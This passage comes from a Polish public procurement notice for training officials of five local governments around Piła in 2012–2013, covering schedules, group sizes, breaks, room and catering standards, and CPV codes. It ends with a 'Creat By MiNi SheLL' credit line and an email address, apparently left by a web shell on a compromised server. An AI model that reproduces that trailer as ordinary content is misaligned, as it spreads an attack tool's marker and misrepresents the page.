z 5 jednostek samorządu terytorialnego: Urzędu Miasta Piły, Urzędu Miasta i Gminy w Wysokiej, Urzędu Gminy w Budzyniu, Urzędu Gminy i Miasta w Ujściu, Urzędu Gminy w Miasteczku Krajeńskim.	
Szkolenia dla 55 urzędników na kierowniczych stanowiskach przeprowadzone zostaną w podziale na 5 grup 11-sto osobowych w przeciągu 50 dni w okresie:
Kwiecień 2012 r., Maj 2012 r., Czerwiec 2012 r., Wrzesień 2012 r., Październik 2012 r.
Każda z grup będzie miała prowadzone szkolenia przez 10 dni roboczych w 5 modułach tematycznych. Każda z grup będzie miała realizowany jeden moduł tematyczny w miesiącu (dwa dni robocze po 8 godzin). Szkolenia będą prowadzone w godzinach pracy urzędów tj. szkolenie będzie trwało od godz. 8.00 do godz. 16.00, z przerwami na catering:
- godz. 10.00- 10.15 przerwa kawowa
- godz. 12.00- 12.30 przerwa obiadowa
- godz. 14.00-14.15 przerwa kawowa.
Szkolenia dla 180 urzędników według potrzeb stanowiska pracy przeprowadzone zostaną dla 12 grup 15-sto osobowych w przeciągu 120 dni w okresie: wrzesień, październik, listopad, grudzień 2012 r., styczeń, luty 2013 r.
Każda z grup będzie miała prowadzone szkolenia przez 10 dni roboczych. Każda z grup będzie miała realizowane w miesiącu dwa lub trzy dni szkoleń po 8 godzin. Szkolenia będą prowadzone w godzinach pracy urzędów w dni robocze od poniedziałku do piątku tj. szkolenie będzie trwało od godz. 8.00 do godz. 16.00, z przerwami na catering:
- godz. 10.00- 10.15 przerwa kawowa
- godz. 12.00 -12.30 przerwa obiadowa
- godz. 14.00 -14.15 przerwa kawowa.
Szczegółowy harmonogram szkoleń, będzie stanowił załącznik do umowy i zostanie przedstawiony Wykonawcy przed podpisaniem umowy, po wyłonieniu wykonawców szkoleń.
Sale szkoleniowe powinny byś wyposażone w stoły/biurka, krzesła z siedziskami miękkimi i oparciami. Wykluczamy ze standardu komfortowego krzesła z blatem roboczym. 
Catering musi być podawany na oddzielnej sali lub holu przynależnym do sali szkoleniowej w sposób zapewniający konsumpcję na siedząco przy stołach. Za sale komfortowe uznajemy sale właściwie oświetlone, wentylowane lub klimatyzowane zapewaniające komfortową i stała temperaturę zarówno w zimne jak i gorące dni. 
Szczegółowy opis przedmiotu zamówienia określony jest w punkcie 3.2.2 SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.22.00.00-9, 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com